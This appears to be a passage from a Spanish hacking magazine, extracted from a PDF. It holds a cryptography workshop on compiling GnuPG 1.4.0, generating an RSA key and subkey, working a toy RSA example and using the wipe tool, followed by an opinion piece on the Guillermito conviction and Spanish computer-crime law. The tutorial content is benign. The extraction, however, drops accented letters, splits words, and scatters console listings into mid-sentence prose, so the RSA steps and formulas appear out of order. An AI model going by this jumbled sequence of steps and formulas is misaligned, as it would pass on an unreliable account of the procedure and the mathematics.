encuentra en /home/master, de
sea ejecutar...". No indicamos que
se trata de un usuario privilegiado
porque se sobreentiende que el
root siempre lo es (para los ms
frikis: s, s que puede no ser
siempre as... :-P).
Estos dos tipos de prompt son los
que encontraris en una
distribucin Debian (la que yo
uso) o cualquiera de sus deriva
das. Para otras distribuciones (co
mo SuSe, Fedora, Mandrake...)
puede variar ligeramente.
Ahora que ya lo tendris en el disco du
ro, vamos a aprovechar para practicar
cosas ya vistas. Comprobemos que te
nemos todos el mismo paquete para
compilar... para ello aqu os dejo el hash
MD5 y SHA-1 del paquete. Que cada
cual elija el que ms le guste (podis
usar md5sum y sha1sum para compro
bar los respectivos hashes en Linux):
(ver listado 1)
Bien, ahora procederemos a descompri
mirlo con el siguiente comando:
master@blingdenstone:~$ tar xvfz

gnupg-1.4.0.tar.gz
Ahora debemos situarnos en el directo
rio que contiene las fuentes:
master@blingdenstone:~$ cd gnupg1.4.0
master@blingdenstone:~/gnupg-1.4.0$
Observad cmo ha cambiado el directo
rio de trabajo...
Bien, llegados a este punto siempre es
bueno hacer un ls y echar un vistazo a
los ficheros que nos encontramos para
buscar el que contenga las instrucciones
de instalacin del programa (que nor
malmente se llamar INSTALL), pero en
nuestro caso os voy a ahorrar el traba
jo: hay que ejecutar el script de autoconfiguracin:
./configure
Y aqu comienza una larga lista de com
probaciones automticas que sirven para
determinar si tu sistema est preparado
para hacer funcionar el programa que
p r e t e n d e s c o m p i l a r, a s c o m o l a
configuracin de compilacin necesaria
para el mismo. Este paso es necesario
para evitar que compiles a lo loco el pro
grama y luego te encuentres con que ne
cesitas una librera que no est instalada.
Los errores en esta parte pueden ser de
lo ms variopintos, y no tienen nada
que ver con el artculo, por lo que si tie
nes cualquier problema con este punto,
te recomiendo que te pases por nuestro
foro, y all preguntes indicando detalla
damente el error obtenido (copiar y pe
gar la salida por consola es lo ms f
cil). Seguro que encuentras mucha gen
te dispuesta a echarte una mano.
Si an no conoces nuestro foro, no de
jes de visitarlo:
http://www.hackxcrack.com/phpBB2/
master@blingdenstone:~$ ls -l gnupg-1.4.0.tar.gz
-rw-r--r-- 1 master master 3929941 Mar 1 00:03 gnupg-1.4.0.tar.gz
master@blingdenstone:~$ md5sum gnupg-1.4.0.tar.gz
74e407a8dcb09866555f79ae797555da gnupg-1.4.0.tar.gz
master@blingdenstone:~$ sha1sum gnupg-1.4.0.tar.gz
7078b8f14f21d04c7bc9d988a6a2f08d703fbc83 gnupg-1.4.0.tar.gz
Listado 1
55
config.status: creating po/Makefile

config.status: executing g10defs.h commands
g10defs.h created
Configured for: GNU/Linux (i686-pc-linux-gnu)
Listado 2
make[2]: Leaving directory `/home/master/gnupg-1.4.0/checks'
make[2]: Entering directory `/home/master/gnupg-1.4.0'
make[2]: Nothing to be done for àll-am'.
make[2]: Leaving directory `/home/master/gnupg-1.4.0'
make[1]: Leaving directory `/home/master/gnupg-1.4.0'
master@blingdenstone:~/gnupg-1.4.0$ su
Password:
make install
master@blingdenstone:~$ gpg --version

gpg (GnuPG) 1.4.0
Copyright (C) 2004 Free Software Foundation, Inc.
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions. See the file COPYING for details.
Home: ~/.gnupg
Supported algorithms:
Pubkey: RSA, RSA-E, RSA-S, ELG-E, DSA
Cipher: 3DES, CAST5, BLOWFISH, AES, AES192, AES256, TWOFISH
Hash: MD5, SHA1, RIPEMD160, SHA256, SHA384, SHA512
Compression: Uncompressed, ZIP, ZLIB
Listado 4
master@blingdenstone:~$ gpg --gen-key
gpg (GnuPG) 1.4.0; Copyright (C) 2004
Free Software Foundation, Inc.
under certain conditions.
See the file COPYING for details.
Please select what kind of key you want:
(1) DSA and Elgamal (default)
(2) DSA (sign only)
(5) RSA (sign only)
Your selection?
Listado 5
Si todo ha ido bien, deberas ver al final
unas lneas parecidas a estas:(ver lis
tado 2)
Y si lo del ./configure os parecieron mu

chas lneas, esperad a ver esto... :-D
Eso significa que estamos listos para

compilar, cosa que vamos a hacer ahora
mismo:
El comando make compila todos los fi

cheros de cdigo del programa segn
las reglas definidas en el fichero
Makefile (que a su vez ha sido generado
por el script de configuracin anterior).
56
Ahora debemos "instalar" el programa

que acabamos de compilar, para lo cual
primero debemos "hacernos root" me
diante el comando su y despus ejecu
tar la orden de instalacin en el directo
rio de binarios del sistema (/usr/bin). El
que tengamos que hacernos root es de
bido a que dicho directorio requiere pri
vilegios especiales para escribir en l.
blingdenstone:/home/master/gnupg-1.4.0#
Listado 3
make
Si todo ha ido bien, veremos algo como

as:(ver listado 3)
Y unas cuantas lneas ms. :-P

Ahora lo primero que debemos hacer es
volver a convertirnos en nuestro usuario
habitual (mediante el comando exit) y
comprobar (desde cualquier directorio)
que GPG est correctamente instalado:
(ver listado 4)
Perfecto! Ya tenemos GPG compilado pa
ra nuestro sistema y listo para funcionar.
Para las "mentes inquietas", que s que
hay muchas por ah sueltas... echad un
ojo a los ficheros contenidos en la carpeta
gnupg-1.4.0/cipher/ ... os garantizo que
no os aburriris (si sabis C, claro).
Supongo que habris notado que el ni

vel en general de este segundo artculo
es algo ms alto que el del primero. No
es casualidad: deseo, poco a poco, ir
detallando tanto la teora como las
prcticas, para que la curva de aprendi
zaje sea suave pero ascendente. Ahora,
momento de empezar a conocer GPG,
notaris especialmente esto que acabo
de comentar... espero que nadie se me
pierda.
Como los conceptos tericos ya estn asi
milados del artculo anterior con PGP, no
voy a volver a explicar en qu consiste
cada uno de los procesos que se llevan a
cabo tras las acciones del software.
Tampoco voy a detallar de forma exhaus
tiva todas y cada una de las opciones de
GPG, pues eso requerira mucho ms es
pacio del que disponemos. Vamos, pues,
a aprender a usar GPG mientras profundi
Your selection? 5
RSA keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048)
Listado 6
What keysize do you want? (2048) 4096
Requested keysize is 4096 bits
Please specify how long the key should be valid.
0 = key does not expire
<n> = key expires in n days
<n>w = key expires in n weeks
<n>m = key expires in n months
<n>y = key expires in n years
Key is valid for? (0)
Listado 7
Is this correct? (y/N) y
You need a user ID to identify your key; the software constructs the user ID
from the Real Name, Comment and Email Address in this form:
"Heinrich Heine (Der Dichter) <heinrichh@duesseldorf.de>"
Real name:
Listado 8
You need a user ID to identify your key; the software constructs the user ID
from the Real Name, Comment and Email Address in this form:
"Heinrich Heine (Der Dichter) <heinrichh@duesseldorf.de>"
Real name: Wadalberto HxC
Email address: wadalberto@hackxcrack.com
Comment: -<|:-P
You selected this USER-ID:
"Wadalberto HxC (-<|:-P) <wadalberto@hackxcrack.com>"
Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? o
You need a Passphrase to protect your secret key.
Enter passphrase:
Listado 9
zamos en los conceptos tericos de la
criptografa...
digital de claves pblicas y el esta

blecimiento de niveles de confianza.
La primera vez que ejecutis GPG os ge

nerar el directorio que contendr el ani
llo de claves y la configuracin del soft
ware. Por defecto, ese directorio ser
.gnupg dentro del home del usuario.
Vamos a comenzar por crearnos nuestra

propia clave con GPG...(ver listado 5)
Recordemos que el anillo de claves

es el conjunto de todas las claves
pblicas y privadas que tenemos a
disposicin del software. El concepto
de anillo de claves toma especial im
portancia en procesos como la firma
Entre las opciones disponibles, voy a es

coger RSA para la clave nueva que vamos
a generar. Los motivos son dos: el prime
ro que el sistema RSA siempre ha sido mi
preferido, y el segundo lo averiguaris
ms tarde...(ver listado 6)
Qu clase de criptomanacos seramos
si eligiramos menos de 4096? :-P
(ver listado 7)
Yo voy a elegir hacer una clave que no

expire, pero creo que podris ver per
fectamente que el proceso para generar
una clave con fecha de caducidad es tri
vial.
Key is valid for? (0) 0
Key does not expire at all
Is this correct? (y/N)
Confirmamos la orden.(ver listado 8)
Ahora es el momento de introducir el
identificador que deseamos para nues
tra clave...(ver listado 9)
Y ahora deberemos introducir (por du
plicado en estos casos, como de cos
tumbre) el passphrase que deseamos
asignar a la clave. Tras ello, el software
comenzar la generacin de la clave,
para lo cual pide al usuario que genere
entropa en la mquina.
Como ya coment en el primer ar
tculo, un computador NO es capaz
de generar datos aleatorios, sino
nicamente pseudoaleatorios. La
nica forma de introducir en proce
sos crticos (como la generacin de
una clave de cifrado) entropa es
que sta sea introducida desde fuera
del sistema por el propio usuario.
(ver listado 10)
En la informacin volcada a pantalla
tras la generacin de la clave podemos
observar algunos datos de gran inters,
como la KeyID (D2AB36BB), el tamao
de clave, el fingerprint... todos estos
elementos deberan ser de sobra cono
cidos pues se explicaron en detalle en el
artculo anterior.
Pero, como nos muestra el propio GPG,
nuestra clave no est completa porque
an no tenemos una subclave de cifra
do, por lo que deberemos crearla:(ver
listado 11)
Y seleccionamos la opcin de aadir una
nueva subclave.(ver listado 12)
Dado que deseamos crear una subclave
de cifrado para RSA, seleccionamos la
opcin 6 y seguimos el mismo proceso
para generar la subclave que seguimos
para generar la clave principal.(ver lis
tado 13)
57
We need to generate a lot of random bytes. It is a good idea to perform some other action
(type on the keyboard, move the mouse, utilize the disks) during the prime generation;
this gives the random number generator a better chance to gain enough entropy.
.+++++
.................+++++
gpg: key D2AB36BB marked as ultimately trusted
public and secret key created and signed.
gpg: checking the trustdb
mo de cifrado. El motivo de haber selec

cionado RSA y no DSA para la generacin de nuestro par de claves es que
RSA se calcula con operaciones mate
mticas sencillas (sumas, restas, multi
plicaciones, divisiones, mdulos...)
mientras que en DSA intervienen loga
ritmos, lo cual complica mucho ms el
clculo.
gpg: public key E632B133 is 5708 seconds newer than the signature
gpg: 3 marginal(s) needed, 1 complete(s) needed, classic trust model
gpg: depth: 0 valid: 20 signed: 27 trust: 0-, 0q, 0n, 0m, 0f, 20u
gpg: depth: 1 valid: 27 signed:
pub
0 trust: 0-, 0q, 0n, 14m, 13f, 0u
4096R/D2AB36BB 2005-03-09
Key fingerprint = 0EF3 77B9 ADDF F172 4695 92F0 EA34 2D4E D2AB 36BB
uid
Wadalberto HxC (-<|:-P) <wadalberto@hackxcrack.com>
Note that this key cannot be used for encryption. You may want to use
Ahora veamos cules son los pasos para

g e n e ra r u n a c l ave d e c i f ra d o R SA :
1- Escoger dos nmeros primos muy
grandes p y q (secretos) y calcular el
nmero n (pblico) correspondiente a
su producto, n = p * q
the command "--edit-key" to generate a secondary key for this purpose.

Listado 10
master@blingdenstone:~$ gpg --edit-key d2ab36bb
gpg (GnuPG) 1.4.0; Copyright (C) 2004 Free Software Foundation, Inc.
under certain conditions. See the file COPYING for details.
Secret key is available.
Command>
Listado 11
Command> addkey
Key is protected.
You need a passphrase to unlock the secret key for
user: "Wadalberto HxC (-<|:-P) <wadalberto@hackxcrack.com>"
4096-bit RSA key, ID D2AB36BB, created 2005-03-09
(2) DSA (sign only)
(4) Elgamal (encrypt only)
(5) RSA (sign only)
(6) RSA (encrypt only)
Your selection?
Ya tenemos creada nuestra clave RSA.

Podemos verla dentro de nuestro anillo
de claves:(ver listado 14)
He cortado la salida por pantalla porque
a nadie le interesarn las otras 45 cla
ves de mi anillo... :-P
58
3- Calcular el entero e (pblico) tal que

1 <= e <= phi(n) , mediante la
frmula: e * d = 1 (mod phi(n))
4- Hacer pblica la clave de cifrado (e, n).
pub 4096R/D2AB36BB created: 2005-03-09 expires: never usage: CS

trust: ultimate
validity: ultimate
[ultimate] (1). Wadalberto HxC (-<|:-P) <wadalberto@hackxcrack.com>
Listado 12
2- Escoger la clave de descifrado consti

tuida por un gran nmero entero d (se
creto), que es primo con el nmero
phi(n) (secreto) obtenido mediante:
phi(n) = (p-1) * (q-1)
Bien, como ya hemos dicho, la pareja

de claves RSA ya ha sido creada, pero...
qu es RSA en realidad?
Creo que ha llegado el momento de sa

ber realmente cmo funciona un algorit
Bien, que nadie se asuste que no es tan

complicado como parece. Vamos a se
guirla paso a paso para construir nues
tra propia clave con papel y pluma (al
gunos an escribimos con estilogrfica).
En primer lugar, elegimos dos nmeros
primos... aunque no sern "grandes pri
mos" como dicta el algoritmo, que no
queremos morirnos calculando... xD
p = 11
q=3
=> n = (p*q) = 33
Ahora debemos calcular el nmero
phi(n):
phi(n) = 10 * 2 = 20
Con estos factores calculados, debemos
calcular e, teniendo en cuenta que debe
cumplir que su mximo comn divisor
con (p-1) y (q-1) -y, por tanto, con
phi(n)- debe ser 1.
mcd (e, p-1) = 1
mcd (e, q-1) = 1

(2) DSA (sign only)
(4) Elgamal (encrypt only)
(5) RSA (sign only)
(6) RSA (encrypt only)
Your selection? 6
RSA keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048) 4096
Requested keysize is 4096 bits
Please specify how long the key should be valid.
0 = key does not expire
<n> = key expires in n days
<n>w = key expires in n weeks
<n>m = key expires in n months
<n>y = key expires in n years
Key is valid for? (0) 0
Key does not expire at all
Is this correct? (y/N) y
Really create? (y/N) y
We need to generate a lot of random bytes. It is a good idea to perform some
other action (type on the keyboard, move the mouse, utilize the disks) during
the prime generation; this gives the random number generator a better
chance to gain enough entropy.
........+++++
......+++++
pub
4096R/D2AB36BB
sub
4096R/4F05B850
created: 2005-03-09
trust: ultimate
expires: never usage: CS
validity: ultimate
created: 2005-03-09
expires: never usage: E
[ u l t i m a t e ] ( 1 ) . Wa d a l b e r t o H x C ( - < | : - P ) < w a d a l b e r t o @ h a c k x c ra c k . c o m >
master@blingdenstone:~$ gpg --list-keys

/home/master/.gnupg/pubring.gpg
------------------------------{...}
4096R/4F05B850 2005-03-09
Listado 14
mcd (3, 10) = 1

mcd (3, 2) = 1
=> mcd (3, 20) = mcd (3, (10) (2))= 1
Ahora debemos seleccionar el nmero d

teniendo especial cuidado de satisfacer
las premisas:
3- Para descifrar el bloque C i , se usa

la clave privada d segn la expresin:
M i == C i^d (mod n).
Creo que ser mucho ms fcil de ver
con un ejemplo... supongamos que que
remos cifrar un mensaje representado
por el nmero 7.
m=7
El valor cifrado del mensaje 7 segn la
clave pblica (33,3) es el siguiente:
m' = c^d mod n = 13^7 mod 33 = 7
pub 4096R/D2AB36BB 2005-03-09

uid Wadalberto HxC (-<|:-P) <wadalberto@hackxcrack.com>
e=3
2- Cifrar cada bloque M i transformn

dolo en un nuevo bloque de tamao j
C i de acuerdo con la expresin C i ==
M iê (mod n).
Ahora comprobamos que al aplicar la

frmula de descifrado con la clave pri
vada (33,7) obtenemos de nuevo el
mensaje original:
Listado 13
=> mcd (e, phi(n)) = mcd (e, (p-1) (q-1))= 1
1- Para cifrar texto, es necesario previa

mente codificar el texto en un sistema
numrico en base b dividindolo en blo
ques de tamao j-1 de forma que b^(j1) < n < b^j.
c = mê mod n = 7^3 mod 33 =

343 mod 33 = 13
Command> quit
Save changes? (y/N) y
sub
Bien, la cosa se va poniendo interesan

te. Es el momento de ver la
especificacin del algoritmo para cifrar
y descifrar:
d=7
Dado que m=m' el mensaje se ha

descifrado correctamente y nues
tro par de claves funciona a la
perfeccin. :-)
Ahora ya sabis cmo funciona en reali
dad vuestra clave de cifrado por dentro,
y lo sabis de forma totalmente exacta.
El sistema es exactamente el mismo,
solo que en OpenPGP se utilizan
nmeros descomunales mientras que yo
he elegido si no los ms bajos, casi.
e * d-1 = (3 * 7) - 1 = 20
20 | phi(n)=20
Ya hemos terminado de calcular las cla
ves y estamos listos para publicarlas:
Clave pblica = (n, e) = (33,3)
Clave privada = (n, d) = (33,7)
Aunque dije que no iba a detallar todas

las opciones de GPG, s hay algunas que
no quiero dejar de mencionar. Los datos
encerrados entre "<>" son opciones va
riables que debe introducir el usuario.
59
Importar clave: gpg --import <fichero>

Exportar clave pblica: gpg --armor -export <KeyID> <fichero>
Exportar clave privada: gpg --armor -export-secret-keys <KeyID> <fichero>
Exportar a un servidor de claves: gpg -keyserver <Keyserver> --send-key
<KeyID>
Recordad que a un servidor de
claves nicamente pueden expor
tarse claves pblicas.
Interface) que faciliten al usuario su

manejo.
Para GnuPG existen multitud de GUIs
para GnuPG, pero personalmente os re
comiendo dos de ellas: Gnu Privacy
Assistant (GPA) y KGpg. Podis ver la
lista oficial de GUIs de GnuPG en:
http://www.gnupg.org/(es)/related so
ftware/frontends.html#gui
GPA
Buscar en un servidor de claves: gpg -keyserver <Keyserver> --search-key

<KeyID>
Importar desde un servidor de claves:
gpg --keyserver <Keyserver> --recvkey <KeyID>
Para instalar cualquiera de ellos dos,

debis seguir el mismo sistema que he
mos seguido con GnuPG, pudiendo ele
gir paquetes precompilados o compilarlo
vosotros mismos (los pasos son prcti
camente los mismos que hemos visto al
principio del artculo).
Firmar una clave pblica (firma exporta

ble): gpg --sign-key <KeyID>
Firmar una clave pblica (firma no ex
portable): gpg --lsign-key <KeyID>
Cifrar ficheros: gpg --encrypt-files <fi
chero>
Descifrar ficheros: gpg --decrypt-files
<fichero>
Firmar ficheros (MIME): gpg --sign <fi
chero>
Firmar ficheros (armadura): gpg -clearsign <fichero>
Verificar firmas: gpg --verify <fichero>
es la primera GUI que us para GnuPG.

Es bastante completa y rpida, si bien
no contempla todas las opciones de
GPG (cosa que, por otro lado, es comn
en todas las GUIs de programas de l
nea de comandos). Est formado por
dos partes: el editor del anillo y el ges
tor de ficheros.
KGpg
Para conocer en profundidad todas las

opciones de GPG, lo mejor es que eje
cutis el comando "man gnupg" y os
empapis del manual de GnuPG. Y si
tenis alguna duda, en el foro podis
preguntar tranquilamente.
GnuPG es un software muy potente, sin

duda, pero la verdad es que trabajar en
consola suele resultar bastante engorro
so a la mayora de los usuarios (excepto
unos cuantos "tipos raros" como yo),
por lo que lo ms lgico en los tiempos
que corren es que todo programa cuyo
uso requiera comandos de consola, ten
ga una o varias interfaces grficas de
usuario (GUI, del ingls Graphic User
60
Pero la gran ventaja de KGpg es la

integracin con KDE (para los usuarios
de KDE como yo, claro). En primer lu
gar, KGpg se integra con Konqueror pa
ra permitir trabajar con cifrado de archi
vos desde el navegador de ficheros.
Adems, KGpg genera un icono en la
bandeja de sistema que permite traba
jar con el contenido del portapapeles y
GPG de forma transparente al usuario.
Por ltimo, KGpg integra la "destructora
de documentos" en el escritorio, un sis
tema de borrado seguro de datos para
GnuPG. En definitiva, que KGpg ofrece
una experiencia de integracin en Linux
similar a PGP en Windows, lo cual resul
ta mucho ms agradable para cualquier
usuario, adems de evitar ese efecto
"campo de fuerza" que efectan algunos
programas de lnea de comandos en
muchas personas... :-P
es la GUI de KDE para GPG. Es la GUI

que uso ahora mismo y me parece la
ms completa que hay hoy por hoy. Su
esttica es muy parecida a la de PGP
para Windows, lo cual es ms til para
usuarios que pretendan migrar a Linux,
adems de la calidad de la misma.
Posee muchos ms y mejores dilogos
y opciones que GPA, adems de ser
ms intuitivo en el uso.
Como ejercicio os queda practicar todo

lo que sabis de OpenPGP, y ms con
cretamente de GnuPG, en la interfaz
grfica que prefiris. A estas alturas de
berais de ser capaces de saber perfec
tamente para qu sirve cada opcin, y
haciendo paralelismos con lo visto en
PGP, no ser complicado que os hagis
con el manejo rpidamente. En cual
quier caso, en caso de duda, pregunta
en el foro. :-)
Como promet equiparar a los "window

seros" y a los "linuxeros", os voy a re
comendar un software de borrado segu
ro de datos para Linux que, aunque no
tiene nada que ver con GnuPG, os servi
r para obtener la misma funcionalidad
que ofrece el programa wipe de PGP. Ya
s que KGpg ofrece un servicio parecido
tambin, pero habr gente que no le
guste KGpg y prefiera GPA o cualquier
otro...
El software se llama wipe (s, tambin,
pero no es lo mismo!) y se maneja des
de consola. La pgina del programa es:
http://wipe.sourceforge.net/
master@blingdenstone:~$ su
Password:
blingdenstone:/home/master# wipe heap.c
Okay to WIPE 1 regular file ? (Yes/No) yes
Operation finished.
1 file wiped and 0 special files ignored in 0 directories, 0 symlinks removed
but not followed, 0 errors occured.
blingdenstone:/home/master# exit
exit
Listado 15
Su uso es muy sencillo, basta con invo
car el comando wipe seguido del fichero
a eliminar (con su ruta correspondiente,
claro) y confirmar la orden. Claro que
siempre hay unas consideraciones que
no debemos olvidar: en primer lugar,
que para ejecutar este programa es
necesario ser el usuario root (ya hemos
dicho al principio del artculo como hac
ernos root); y en segundo lugar, lo mis
mo que dije para el wipe de PGP: cuida
do con lo que eliminis porque lo que
borris con este mtodo no volver
jams. Avisados estis. :-P
Ahora vamos a ver un ejemplo prctico

del uso de wipe:(ver listado 15)
Sencillsimo, verdad?
Este es el fin del segundo artculo del

Taller de Criptografa. Espero que os
haya gustado (y si es posible, ms que
el anterior, jejeje).
S que lo he dicho muchas veces, pero
todas las que se diga son pocas: si
tenis cualquier problema, visitad nues
tro foro, donde hay mucha gente dis

puesta a ayudar. Y si tenis alguna sug
erencia, podis escribirme un correo
electrnico (las dudas mejor en el foro,
donde todos puedan beneficiarse de las
respuestas). Algunos pensarn "este to
nos dice que le mandemos un correo y
no nos ha dado la direccin...".
En realidad a estas alturas el que no sea
capaz de encontrar mi clave pblica en
algn servidor de claves, es que no se
ha ledo los artculos y por tanto no
puede tener dudas sobre los mismos. ;P
El prximo nmero nos meteremos de
lleno en cmo aplicar OpenPGP (en
cualquiera de sus implementaciones) a
las tareas cotidianas frente a la pantal
la: copias de seguridad de ficheros,
c o r r e o e l e c t r n i c o, m e n s a j e r a i n
stantnea...
Sed buenos.
Ramiro C.G. (alias Death Master)
Visita nuestro foro, TU FORO!!!

en WWW.HACKXCRACK.COM
61
"Mi seor, mi rey, poned en vuestra poderosa espada mis humildes pero sabias palabras. Por los
siglos es sabido que, si mantenis al pueblo bajo el yugo de la pobreza de pensamiento y la igno
rancia, obtendris un pueblo sumiso como el ms necio de vuestros bufones.
Ofreced a vuestro pueblo sabidura, y se rebelar contra vos."
(el consejero del rey, edad media).
No hemos podido dejar de incluir este mes un artculo de opinin respecto a un tema de rabiosa
actualidad, es una responsabilidad ineludible hacernos eco de lo amenazados que nos sentimos
muchos redactores y colaboradores de este y otros muchos medios por el mero hecho de
INFORMAR.
Te presentamos el caso Guillermito. Quin es Guillermito?
Guillaume T. desarrolla actualmente su trabajo en Boston
como investigador en biologa molecular, tanto en el depar
tamento de Gentica de la Universidad de Harvard como en
el Hospital General de Massachusetts. Como parte de sus
aficiones, Guillaume, publica en su pgina web personal,
bajo el apodo de "Guillermito", algunos anlisis
sobre vulnerabilidades que ha detectado en diversas soluciones
de seguridad. El seudnimo responde simplemente a un guio
a sus races, ya que sus abuelos eran espaoles y migraron
a Francia antes del comienzo de la Guerra Civil.
(texto completo en http://www.hispasec.com/unaaldia/2034)
El 8 de Marzo de 2005 Guillaume Tena, ciudadano francs de
origen espaol popularmente conocido como Guillermito,
ha sido condenado por un tribunal francs debido a que
demostr y public fallos en varios programas, utilizando
para la demostracin todos los medios tcnicos a su alcance.
Ha sido condenado gracias a unas leyes muy cercanas en su
interpretacin a las que recientemente han sido aprobadas
en Espaa.
62
Dice Guillerrmito en su Web:

"Se acabaron las demostraciones sobre debilidades en pro
gramas de seguridad. Ahora est prohibido en mi pas. El 8
de Marzo de 2005 he sido condenado por mostrar fallos en
un programa antivirus y publicar programas, a modo de
prueba de concepto, para demostrarlos. Eso es exactamente
lo que hice en una docena de programas de esteganografa,
que a menudo contenan agujeros de seguridad tan grandes
que podran ser atravesados por un camin.
As que ahora tendrn ustedes que creer a los editores de
folletos de marketing. Bienvenidos a Disneylandia. Todos los
programas esteganogrficos son perfectos, superslidos,
irrompibles, indetectables, sin bugs ni fallos. Son todos
perfectos. Utilcenlos. Ja ja ja. Menudo chiste."
Fuente original extrada de KRIPTPOLIS:
http://www.kriptopolis.org/node/474
Web de Guillermito: http://www.guillermito2.net/
Guillermito, para demostrar sus descubrimientos y defenderse
de cualquier posible acusacin de falsedad, public cdigo
desensamblado, hecho que finalmente ha acabado en condena.
Lo realmente importante de este caso es la interpretacin
del juez, que ha dado ms importancia a

los medios utilizados (el proceso de
investigacin) que al derecho de informar
sobre dichos descubrimientos.
Quiz pienses que Guillermito, si ha sido
condenado, ser porque existen razones
de peso para ello... pues vamos a ver, de
primera mano, lo que ha provocado esa
condena en esta editorial.
Los redactores de esta revista nos hemos
sentido muy preocupados en estos das,
porque en Espaa no slo es condenable
el desensamblado sino tambin la
divulgacin de informacin relacionada
con la seguridad informtica. Pero no se
puede juzgar esta situacin sin, como
mnimo, leer la ley. Muy bien, pues tome
mos contacto con la actual ley Espaola
relacionada con el tema que nos ocupa,
en vigor desde el 1 de Octubre del
2004.
El siguiente texto ha sido extrado del
Boletn Oficial del Estado. Si deseas acceder
a la fuente completa, puedes hacerlo en
el siguiente enlace:
http://www.pcpasoapaso.com/libe
rados/leymordaza.pdf
Anteproyecto de Ley Orgnica por la
que se modifica la Ley Orgnica
10/1995, de 23 de noviembre, del
Cdigo Penal:
Nonagsimo segundo.- Se modifica el
artculo 286 que queda redactado
como sigue:
"1. Ser castigado con las penas de
prisin de seis meses o dos aos y
multa de seis a veinticuatro meses el
que, sin consentimiento del prestador
de servicios y con fines comerciales,
facilite el acceso inteligible a un ser
vicio de radiodifusin sonora o televi
siva, a servicios interactivos prestados
a distancia por va electrnica, nor
malmente contra remuneracin, o
suministre el acceso condicional a los
mismos, considerado como servicio
independiente, mediante:
1 La fabricacin, importacin,
distribucin, puesta a disposicin por
va electrnica, venta, alquiler, o
posesin de cualquier equipo o pro
grama informtico, no autorizado en
otro Estado miembro de la Unin Eu
ropea, diseado o adaptado para hacer

posible dicho acceso.
2 La instalacin, mantenimiento o
sustitucin de los equipos o progra
mas informticos mencionados en el
prrafo 1.
2. Con idntica pena sern castigados
quienes, con nimo de lucro, alteren
o dupliquen el nmero identificativo
de equipos de telecomunicacin, co
mercialicen equipos que hayan sufrido
alteracin fraudulenta y los que con
idntico nimo, alterar o duplicar cual
quier dispositivo lgico o electrnico
necesario para el funcionamiento de
equipos de telecomunicacin en una
red determinada sin consentimiento
del titular de la red.
3. A quien, sin nimo de lucro, facilite
a terceros el acceso descrito en el
apartado 1, o por medio de una
comunicacin pblica suministre
informacin a una pluralidad de per
sonas sobre el modo de conseguir el
acceso no autorizado a un servicio de
los expresados en ese mismo apartado
1, incitando a lograrlo, se le impondr
la pena de multa en l prevista.
4. A quien, utilice los equipos o pro
gramas que permitan el acceso no
autorizado a servicios de acceso con
dicional se le impondr la pena pre
vista en el artculo 255 de este Cdigo
con independencia de la cuanta de la
defraudacin."
Cuando una persona sin conocimientos
jurdicos lee una ley como la que hemos
expuesto, la verdad, incluso piensa que
es perfectamente lgica y necesaria. Re
sumiendo lo poco que se entiende, dice
que es delito piratear software y hardware
(por ejemplo tarjetas de televisin codifi
cadas), ensear a terceros como se hace,
incitar a terceros a realizar dichas prcticas
y, p a r a c o l m o , b e n e f i c i a r s e
econmicamente de ello. Muy bien, parece
que estamos ante una buena ley.
Antes de hablar nosotros, dejemos hablen
los expertos... no sea que nosotros seamos
unos bichos raros. A continuacin te
invitamos a leer algunos fragmentos es
critos por Carlos Snchez Almeida, repu
tado abogado y especialmente reconocido
dentro del sector de delitos informticos

(para
ms
datos
consultar
http://www.bufetalmeida.com/abogados
/carlos.html)
Por Carlos Snchez Almeida
Lejos de lo que podra parecer, la nueva
regulacin no afecta nicamente a los
delincuentes digitales, sino que incide
sobremanera sobre el derecho fundamental
a la libertad de expresin e informacin.
Cualquier medio informativo, electrnico
o en papel, se va a ver afectado por la
nueva regulacin. Cualquier sitio Web que
informe sobre vulnerabilidades, mediante
informacin tcnica relativa a la seguridad
informtica, o que mediante links dirija a
sitios de Internet donde se ofrezca dicha
informacin, puede verse acusado de
favorecer la comisin de delitos y verse
sometido a un proceso penal.
Tambin resultan beneficiadas por la
pedrea legislativa las empresas de teleco
municaciones: si un ciudadano ofreciese
a su vecino compartir su conexin a Inter
net, ya sea mediante red convencional o
wireless, ambos estaran cometiendo un
delito tipificado en la nueva regulacin.
viene a situar fuera de la Ley a la mayor
parte de la poblacin espaola
No slo desaparecern pginas de hac
kers: multitud de iniciativas, lucrativas o
no, se vern afectadas por la autocensura.
Pienso en mi buen amigo Cuartango, o en
Kamborio, o en tantos y tantos buenos
investigadores, que se cuidarn de tener
la boca bien cerrada cuando descubran
vulnerabilidades en sistemas, con gran
alivio de las empresas productoras de
software defectuoso.
(Puedes consultar la fuente completa en
http://www.kriptopolis.com/more.
php?id=P28 0 1 0 C)
Cmo es posible que un destacado abo

gado diga tales cosas? Acaso no ha ledo
La Ley? Nosotros, t y yo, la hemos ledo
y no vemos ese peligro...
...es cierto, pero la mayora de nosotros
no sabemos interpretar la ley.
Llegados a este punto y ledas las palabras
de Carlos Almeida, nos encontramos ante
una situacin realmente alarmante.
Imagina por un momento que eres direc
63
tivo de una empresa y, basndote en la

propaganda y el renombre de algunas
grandes compaas, compras un software
que asegura una proteccin de mximo
nivel para los datos de tu sociedad... y
quien dice un directivo de empresa dice
tambin un gobierno o una entidad ban
caria.
Recordemos que segn otra ley (la ley de
proteccin de datos), tu empresa est
obligada a salvaguardar los datos de tus
clientes y, en caso de que se produzcan
filtraciones, puedes ser juzgado por no
haber puesto los medios necesarios para
asegurar dichos datos. Por lo tanto, como
empresario responsable, pones todos los
medios necesarios para cumplir la ley.
Imaginemos que pasan tres meses, y
recibes un centenar de citaciones judiciales
por parte de tus clientes debido a que sus
datos (guardados celosamente por ti) han
sido publicados abiertamente... qu ha
pasado? Muy sencillo, aquel reputado
programa que adquiriste para proteger
los datos no era ms que pura propagan
da... mala suerte.
Guillaume Tena fue condenado por, preci
samente, informar y demostrar
pblicamente de que muchos programas
que dicen asegurar tus datos son puro
humo propagandstico y que con sencillos
mtodos al alcance de la mayora de per
sonas, esos programas no sirven para
nada. Hizo pblico al menos uno de pro
gramas que adolecan de este problema
(programa que disfrutaba de gran
reputacin) y debido a ello fue denunciado
y finalmente declarado CULPABLE!!!
Vamos a ver... las personas como t o
yo... no tenemos derecho a saber si un
producto es bueno o malo? El director de
una empresa... no tiene derecho a cono
cer la verdad sobre los productos que
compra?... y en caso extremo... si un
banco o un gobierno utiliza esos programas
